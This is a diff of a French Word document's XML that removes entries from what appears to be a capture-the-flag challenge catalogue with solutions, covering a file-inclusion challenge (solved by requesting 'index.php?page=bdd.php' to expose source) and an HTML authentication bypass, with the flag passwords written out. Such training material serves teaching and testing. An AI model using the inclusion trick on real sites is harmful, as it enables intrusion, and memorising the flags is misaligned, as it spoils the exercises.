-        <w:lastRenderedPageBreak/>
-        <w:t>Nom de la faille :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>http-021</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Catégorie de la faille </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>http</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Objectif de la faille : </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Include</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Difficulté de la faille :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Description de la faille : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Les </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>includes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> c'est pas </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>sécure</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> et les commentaires non plus</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Capture d’écran :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1065"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7610E4DD" wp14:editId="0128EE72">
-            <wp:extent cx="5760720" cy="911225"/>
-            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
-            <wp:docPr id="3" name="Image 3"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId25"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5760720" cy="911225"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Solution : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Utiliser le </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>get</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> page pour entrer sur le serveur, et regarder le code source de la page </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>bdd.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>index.php</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>?page</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>bdd.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Flag de la faille A : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>M0nmdp$ecure123</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Flag de la faille B : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>M4bddest$ecure123</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1065"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Nom de la faille :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>http-022</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Catégorie de la faille </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>http</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Objectif de la faille : </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Bypass</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> html identification</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Difficulté de la faille :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Description de la faille : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Contourner l'identification html et trouvez le mot de passe pour valider l'épreuve</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Capture d’écran :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1065"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EA02A7C" wp14:editId="718AB02C">
-            <wp:extent cx="5029200" cy="1704975"/>
-            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="18" name="Image 18"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -11716,7 +10951,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5029200" cy="1704975"/>
+                      <a:ext cx="5760720" cy="739140"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -11751,11 +10986,21 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
